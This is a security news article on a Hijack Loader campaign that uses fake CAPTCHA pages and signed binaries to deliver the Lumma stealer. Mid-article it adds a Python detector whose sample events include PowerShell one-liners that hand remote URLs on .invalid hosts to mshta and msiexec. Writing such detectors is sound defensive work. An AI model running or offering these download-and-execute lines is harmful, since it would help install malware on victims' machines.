A new wave of attacks uses Windows system utilities to bypass protection.
Researchers from the French company HarfangLab have discovered a new malicious campaign spreading the Hijack Loader malware using legitimate digital signature certificates. Malicious activity was recorded in early October; the goal of the attack was to install a data-stealing program called Lumma.
Hijack Loader, also known as DOILoader and SHADOWLADDER, first came to prominence in September 2023. It is distributed through the download of fake files under the guise of pirated software or movies. The new versions of the attacks direct users to fake CAPTCHA pages that prompt them to enter and run a malicious PowerShell command that downloads the infected archive.
HarfangLab has observed three variations of the malicious PowerShell script since mid-September of this year. Among them are scripts that use "mshta.exe" and "msiexec.exe" to execute code and download malicious data from remote servers.
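As an added example (not code from HarfangLab or the article), the following Python flags process-creation events that match the paste-and-run pattern described above: PowerShell launched from a user's shell or browser, handing a remote URL to mshta.exe or msiexec.exe. The field names, the parent-process list and the sample events are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Utilities named in the report as the stage-two downloaders invoked by the
# fake-CAPTCHA PowerShell one-liners.
LOLBIN_RE = re.compile(r"\b(mshta|msiexec)(\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Parents that show a user pasted the command into a Run dialog or a
# browser-driven prompt rather than an installer or service (assumed set).
PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str
    parent_image: str
    command_line: str


def reasons_for(ev: ProcessEvent) -> list[str]:
    """Return the indicators a process-creation event matches (empty = clean)."""
    reasons = []
    cmd, image = ev.command_line, ev.image.lower()
    if image == "powershell.exe" and ev.parent_image.lower() in PASTE_PARENTS:
        reasons.append("powershell launched from a user shell or browser (paste-and-run)")
    if (LOLBIN_RE.search(image) or LOLBIN_RE.search(cmd)) and URL_RE.search(cmd):
        reasons.append("mshta/msiexec given a remote URL as its payload source")
    if re.search(r"-(w|windowstyle)\s+hidden", cmd, re.IGNORECASE):
        reasons.append("console window hidden from the user")
    if re.search(r"-(e|enc|encodedcommand)\s", cmd, re.IGNORECASE):
        reasons.append("Base64-encoded command block")
    return reasons


def is_suspicious(ev: ProcessEvent) -> bool:
    """A remote URL handed to mshta/msiexec is decisive on its own; otherwise
    require two weaker indicators so routine admin scripts stay quiet."""
    hits = reasons_for(ev)
    return any("remote URL" in r for r in hits) or len(hits) >= 2


# Constructed sample events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe", "explorer.exe",
                 'powershell -w hidden -c "mshta http://captcha.invalid/verify.mp4"'),
    ProcessEvent("powershell.exe", "explorer.exe",
                 'powershell -NoProfile -c "msiexec /i https://cdn.invalid/setup.msi /qn"'),
    ProcessEvent("msiexec.exe", "services.exe", r"C:\Windows\System32\msiexec.exe /V"),
    ProcessEvent("powershell.exe", "explorer.exe", "powershell Get-Date"),
]
```

Running `[is_suspicious(e) for e in SAMPLE_EVENTS]` flags the first two events and leaves the service-launched installer and the plain interactive PowerShell alone.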
The archive that victims download contains both a legitimate executable file and a malicious DLL that loads Hijack Loader. The malicious file decrypts and executes encoded data designed to download and run an infostealer.
Since October 2024, attackers have started using signed binaries instead of DLLs to avoid detection by antivirus programs. While it is unclear whether all of the certificates were stolen, experts believe that some of them may have been generated by the attackers. Reportedly, the certificates used to sign the malware have already been revoked.
SonicWall has also recently reported an increase in attacks aimed at infecting Windows, but this time with the help of the CoreWarrior malware, a Trojan that spreads rapidly, spawning many copies of itself and opening backdoors for remote access.
The use of legitimate digital signatures to distribute malware shows that even conventional methods of protection can become an effective tool in the hands of cybercriminals. This highlights the importance of constantly improving cybersecurity and being alert to any suspicious activity, even if it seems safe at first glance.
Source